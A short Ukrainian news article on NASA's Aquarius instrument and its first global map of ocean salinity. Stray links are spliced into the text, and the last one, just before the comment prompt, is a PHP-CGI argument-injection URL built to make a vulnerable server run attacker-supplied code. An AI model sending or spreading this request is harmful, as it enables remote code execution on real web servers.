НАСА склало карту солоності океанів Землі

18 жовтня 2011 | Автор: Андрій

http://toriigateinc.com/information-technology/ НАСА зібрало на борту міжнародного супутника прилад, який зробив першу глобальну карту солоності океанів Землі, всього через три місяці після того, як високотехнологічні датчики були відправлені на орбіту.

На барвистій карті жовтий і червоний кольори виділяють області високої солоності (або вмісту солі), синій і пурпурний вказують на області низької солоності. Прогалини в даних відзначені чорним кольором.

Відомий як Aquarius, прилад надав НАСА перші спостереження з космосу про солоності на поверхні океану – ключовому компоненті клімату Землі, який впливає на циркуляцію океану і пов’язаний з якістю прісної води на планеті.

Прилад працює краще, ніж очікували вчені НАСА. Нова карта була виготовлена з даних за перші два з половиною тижні роботи Aquarius. Прилад був відправлений у космос 10 червня 2011 і приступив до роботи 25 серпня.

http://lauraeldret.com/cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n Додати коментар: